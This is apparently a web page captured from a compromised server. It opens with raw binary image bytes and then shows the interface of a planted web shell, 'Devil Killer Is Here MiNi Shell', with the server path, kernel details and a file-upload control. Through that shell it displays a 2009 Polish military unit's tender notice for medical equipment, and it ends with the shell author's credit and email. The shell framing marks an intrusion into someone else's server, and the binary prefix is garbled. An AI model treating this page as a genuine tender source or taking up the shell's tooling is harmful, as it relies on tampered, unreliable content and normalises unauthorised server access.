JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091006/348246-N-2009.html

<p class="kh_header"><b>Koszalin: Dostawa mebli medycznych i sprzetu medycznego w zestawach 1-18 numer sprawy 3/SZ/09</b><br>
<b>Numer ogłoszenia: 348246 - 2009; data zamieszczenia: 06.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Jednostka Wojskowa Nr 1223 , ul. 4 Marca, 75-901 Koszalin, woj. zachodniopomorskie, tel. 094 3456260, faks 094 3456545.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: OBRONA NARODOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mebli medycznych i sprzetu medycznego w zestawach 1-18 numer sprawy 3/SZ/09.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa mebli medycznych i sprzętu medycznego dla JW. 1223 w Koszalinie zgodnie z zadaniami od 1 do 18..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 33.10.00.00-1, 33.19.31.20-6, 38.41.20.00-6, 33.19.00.00-8, 33.11.44.00-2, 33.14.16.24-0, 33.14.17.70-8, 33.14.17.10-0, 33.16.70.00-8, 33.19.23.00-5, 33.19.21.30-2, 33.19.00.00-8, 39.71.11.30-9, 33.19.31.20-6, 33.15.72.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 18.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE DOTYCZY<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W prowadzonym postępowaniu o udzielenie zamówienia mogą uczestniczyć Wykonawcy, którzy spełniają warunki Zamawiającego określone w niniejszej Specyfikacji Istotnych Warunków Zamówienia i wykażą że:
1.	posiadają aktualny odpis z właściwego rejestru lub aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione (lub uaktualnione) przez odpowiedni, uprawniony do ich wystawienia organ, wystawionego nie wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	złożą oświadczenie, że wykonawca nie zalega z opłacaniem podatków lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wg wzoru zawartego w załączniku nr 19); 
3.	złożą oświadczenie, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie            w całości wykonania decyzji właściwego organu (wg wzoru zawartego             w załączniku nr 20);

4.	złożą oświadczenie o spełnieniu art.22.ust.1 prawa zamówień publicznych (wg wzoru zawartego w załączniku nr 21);

Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą  spełnia- nie spełnia.</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	aktualny odpis z właściwego rejestru lub aktualnego zaświadczenia o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione (lub uaktualnione) przez odpowiedni, uprawniony do ich wystawienia organ, wystawionego nie wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
2.	oświadczenie, że wykonawca nie zalega z opłacaniem podatków lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wg wzoru zawartego w załączniku nr 19);
3.	oświadczenie, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne lub społeczne, lub, że uzyskał zgodę na zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności, lub wstrzymanie w całości wykonania decyzji właściwego organu (wg wzoru zawartego w załączniku nr 20).
4.	oświadczenie o spełnieniu art.22 ust 1 ustawy Prawo Zamówień Publicznych (wg wzoru zawartego w załączniku nr 21)

Zamawiający dokona oceny spełnienia przez Wykonawców warunków udziału w postępowaniu na podstawie załączonych dokumentów i oświadczeń, zgodnie z formułą spełnia- nie spełnia.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> ww.przetargi.army.mil.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ:można uzyskać w siedzibie Zamawiającego (budynek 1, KANCELARIA 221) lub pocztą, po złożeniu/przesłaniu wniosku, lub na stronie internetowej www.przetargi.army.mil.pl.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.10.2009 godzina 08:45, miejsce: Oferty należy składać w terminie do dnia     19.10.2009r. do godziny 8.45 
osobiście w siedzibie Zamawiającego - Kancelaria jawna JW. 1223  w godzinach 8.00 -10.00  lub pocztą ..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NIE DOTYCZY.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> WÓZEK INWALIDZKI - 2 SZTUKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WÓZEK INWALIDZKI - 2 SZTUKI.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.31.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> OTOSKOP - 1 KOMPLET.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OTOSKOP - 1 KOMPLET.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> TERMOMETR 1 KOMPLET.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> TERMOMETR 1 KOMPLET.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.41.20.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> CIŚNIENIOMIERZ ELEKTRYCZNY - 2 KOMPLETY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CIŚNIENIOMIERZ ELEKTRYCZNY - 2 KOMPLETY.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> STETOSKOP LEKARSKI, INTERNISTYCZNY - 5 SZTUK.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> STETOSKOP LEKARSKI, INTERNISTYCZNY - 5 SZTUK.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> BATERIA DO LIFELINE AED - 3 SZTUKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> BATERIA DO LIFELINE AED - 3 SZTUKI.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.40.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> NOZYCZKI RATOWNICZE 10 SZTUK.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> NOZYCZKI RATOWNICZE 10 SZTUK.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> AMPULARIUM - 10 SZTUK.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> AMPULARIUM - 10 SZTUK.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.16.24-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> ZESTAW SZYN KRAMERA -3 KOMPLETY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZESTAW SZYN KRAMERA -3 KOMPLETY.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.17.70-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> KULE ŁOKCIOWE - 20 SZTUK.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KULE ŁOKCIOWE - 20 SZTUK.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.17.10-0.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> LAMPA DIAGNOSTYCZNA - 2 SZTUKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LAMPA DIAGNOSTYCZNA - 2 SZTUKI.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.16.70.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> MEBLE MEDYCZNE - 3 KOMPLETY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> MEBLE MEDYCZNE - 3 KOMPLETY.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> ŁOZKO WIELOFUNKCYJNE STEROWANE ELEKTRYCZNIE - 1 SZTUKA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ŁOZKO WIELOFUNKCYJNE STEROWANE ELEKTRYCZNIE - 1 SZTUKA.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.23.00-5.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> KRZESEŁKO TRANSPORTOWE  - 2 SZTUKI.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> KRZESEŁKO TRANSPORTOWE  - 2 SZTUKI.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> DESTYLARKA WODY - 1 SZTUKA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> DESTYLARKA WODY - 1 SZTUKA.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 16 <b>NAZWA:</b> WITRYNA CHŁODNICZA - 1 SZTUKA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WITRYNA CHŁODNICZA - 1 SZTUKA.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.71.11.30-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 17 <b>NAZWA:</b> WÓZEK MEDYCZNY FUNKCYJNY, MODEL PODSTAWOWY WK-40.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> WÓZEK MEDYCZNY FUNKCYJNY, MODEL PODSTAWOWY WK-40.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.31.20-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 18 <b>NAZWA:</b> ZESTAW TLENOWY NA WÓZKU - 1 SZTUKA.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ZESTAW TLENOWY NA WÓZKU - 1 SZTUKA.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.15.72.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com